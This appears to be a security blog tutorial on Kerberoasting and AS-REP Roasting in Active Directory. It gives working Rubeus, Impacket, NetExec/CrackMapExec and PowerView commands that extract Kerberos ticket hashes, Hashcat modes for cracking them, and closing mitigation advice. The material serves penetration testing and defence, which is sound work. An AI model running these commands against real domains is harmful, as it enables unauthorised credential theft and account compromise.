Introduction
Kerberos authentication is widely used in enterprise environments, but misconfigurations can expose vulnerabilities. Two commonly exploited attacks are Kerberoasting and AS-REP Roasting, which can be performed from any domain user or domain computer account. This blog will cover the attack methodology, demonstrate how to extract hashes using multiple tools, and discuss how to crack them using Hashcat with appropriate hash modes.
Kerberoasting
What is Kerberoasting?
Kerberoasting targets Service Principal Names (SPNs) associated with service accounts in Active Directory. When a service account has this enabled, attackers can request a Kerberos service ticket (TGS) encrypted with that account’s NTLM hash and attempt to crack it offline.
Extracting Kerberoasting Hashes
The following tools can be used to extract Kerberos TGS hashes for offline cracking:
1. Rubeus (Windows)
Rubeus kerberoast /format:hashcat /outfile:hashes.txt2. Impacket (*unix)
# Query all accounts with the SPN flag
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt
# Single target a user
GetUserSPNs.py -request-user <TARGET> -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt3. NetExec/CrackMapExec (*unix)
nxc ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting output.txt
CrackMapExec ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting output.txt4. PowerView (PowerShell)
Get-NetUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File -Encoding ASCII hashes.txtAS-REP Roasting
What is AS-REP Roasting?
AS-REP Roasting exploits Kerberos accounts that have pre-authentication disabled. Without pre-authentication, attackers can request an AS-REP (Authentication Server Response), which contains data encrypted with the user’s password hash, making it vulnerable to offline cracking.
Extracting AS-REP Roasting Hashes
The following tools can be used to perform AS-REP Roasting:
1. Rubeus (Windows)
Rubeus asreproast /format:hashcat /outfile:asrep_hashes.txt2. Impacket (Linux/Mac)
Don’t have a list of users but do have credentials? The below will request it for all accounts.
GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile asrep_hashes.txtHave a list of users but no credentials? The below will query each account to determine susceptibility.
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -outputfile asrep_hashes.txt3. NetExec/CrackMapExec (*unix)
nxc ldap <DC_IP> -u <USER> -p <PASSWORD> --asreproast output.txt
CrackMapExec ldap <DC_IP> -u <USER> -p <PASSWORD> --asreproast output.txtCracking Kerberos Hashes with Hashcat
Once Kerberos hashes are extracted, we can use a password recovery tool to crack them. Most of us prefer Hashcat since it utilizes GPU processing power to its fullest extent.
Hash Modes for Kerberoasting and AS-REP Roasting
| Hash Mode | Encryption | Example |
|---|---|---|
| 13100 | etype 23, TGS-REP (RC4) | $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe4223 |
| 19600 | etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) | $krb5tgs$17$user$realm$8efd91bb01cc698d… |
| 19700 | etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) | $krb5tgs$18$user$realm$8efd91bb01cc698d… |
| 19800 | etype 17, Pre-Auth | $krb5pa$17$user$domain.COM$8efd91bb01cc698d… |
| 19900 | etype 18, Pre-Auth | $krb5pa$18$user$domain.COM$8efd91bb01cc698d… |
| 18200 | etype 23, AS-REP (RC4) | [email protected]:3e156ada591263b8a |
Recommendations
- Use strong, complex passwords (25+ characters) for affected accounts.
- Review the list of AS-REProasting accounts and Enable Kerberos pre-authentication to block AS-REP Roasting.
- Review the list of Kerberoasting accounts and remove the SPN to block Kerberoasting attacks.
- Regularly rotate service account credentials.
- Use the least-privilege model across all accounts.
Sources
- AS-REP Roasting In-Depth Analysis
- How to Crack Hashes with Hashcat
- Kerberos AS-REP Cracking – Hashcat Forum
These resources provide comprehensive information on the attack techniques, tools involved, and methods to crack the extracted hashes using Hashcat.
